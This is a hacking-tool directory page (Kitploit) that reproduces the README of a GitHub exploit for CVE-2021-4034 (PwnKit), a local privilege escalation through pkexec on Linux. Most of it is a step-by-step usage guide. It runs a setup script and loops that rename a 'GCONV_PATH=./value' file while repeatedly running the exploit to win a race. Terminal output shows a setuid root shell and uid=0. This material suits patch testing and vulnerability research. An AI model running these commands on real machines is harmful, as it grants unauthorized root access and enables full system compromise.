Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-4034 — Exploit for CVE-2021-4034 (PwnKit) that leverages a race condition in pkexec to escalate privileges to root on Linux systems. | Kitploit
Tools/GitHubGitHub/ayrx/cve-2021-4034
Privilege EscalationExploit FrameworksExploitationPayload DevelopmentBinary Exploitation
GitHubayrx/cve-2021-4034

CVE-2021-4034

Exploit for CVE-2021-4034 (PwnKit) that leverages a race condition in pkexec to escalate privileges to root on Linux systems.

View Repository
91144 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-4034

Exploit for the pwnkit vulnerability from the Qualys team.

This exploit assumes that gcc is present on the target machine.

root@kitploit:~
$ id
uid=1001(ayrx) gid=1002(ayrx) groups=1002(ayrx),27(sudo)
$ ./setup.sh

Run the following command in one bash session:

root@kitploit:~
while :; do mv "GCONV_PATH=./value" "GCONV_PATH=./value.bak"; mv "GCONV_PATH=./value.bak" "GCONV_PATH=./value"; done

Run the following command in another bash session:

root@kitploit:~
while :; do ./exploit; done

You will eventually win the race and obtain a shell binary that gives you root access:

root@kitploit:~
$ ls -lah shell
-rwsrwxrwx 1 root ayrx 16K Jan 26 08:57 shell
$ ./shell
# id
uid=0(root) gid=1002(ayrx) groups=1002(ayrx),27(sudo)

A short write up on the technique can be found on my blog.

Download Tool